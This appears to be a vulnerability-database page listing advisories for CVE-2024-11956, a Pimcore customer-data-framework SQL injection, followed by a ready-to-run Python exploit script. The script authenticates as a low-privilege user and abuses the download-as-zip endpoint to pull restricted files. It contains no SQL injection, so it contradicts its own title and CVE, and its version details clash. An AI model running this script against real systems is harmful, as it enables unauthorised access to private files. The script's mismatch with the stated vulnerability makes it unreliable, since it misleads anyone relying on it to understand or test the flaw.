| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2024-11956 | 28 Jan 202513:52 | – | circl | |
| Pimcore 注入漏洞 | 28 Jan 202500:00 | – | cnnvd | |
| Pimcore Customer Data Framework SQL Injection Vulnerability | 17 Feb 202500:00 | – | cnvd | |
| CVE-2024-11956 | 28 Jan 202513:46 | – | cve | |
| CVE-2024-11956 Pimcore customer-data-framework list sql injection | 28 Jan 202513:46 | – | cvelist | |
| EUVD-2025-0185 | 3 Oct 202520:07 | – | euvd | |
| Duplicate Advisory: pimcore/customer-data-framework vulnerable to SQL Injection: Hibernate | 28 Jan 202515:31 | – | github | |
| pimcore/customer-data-framework vulnerable to SQL Injection | 28 Jan 202519:14 | – | github | |
| CVE-2024-11956 | 28 Jan 202514:15 | – | nvd | |
| GHSA-8M8M-98C9-VW7Q Duplicate Advisory: pimcore/customer-data-framework vulnerable to SQL Injection: Hibernate | 28 Jan 202515:31 | – | osv |
# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956
import requests
# Replace with target URL and credentials
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"
# Authenticate and get session
session = requests.Session()
login_data = {
"username": USERNAME,
"password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)
if "Login successful" in login_response.text:
print("[+] Authenticated successfully.")
# Exploit the downloadAsZip functionality
download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
payload = {
"ids[]": ["1", "2", "3"] # Replace with IDs of restricted files/folders
}
download_response = session.post(download_url, data=payload)
if download_response.status_code == 200:
print("[+] Exploit successful. Restricted files downloaded.")
with open("restricted_files.zip", "wb") as f:
f.write(download_response.content)
else:
print("[-] Exploit failed. Server returned:", download_response.status_code)
else:
print("[-] Authentication failed.")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation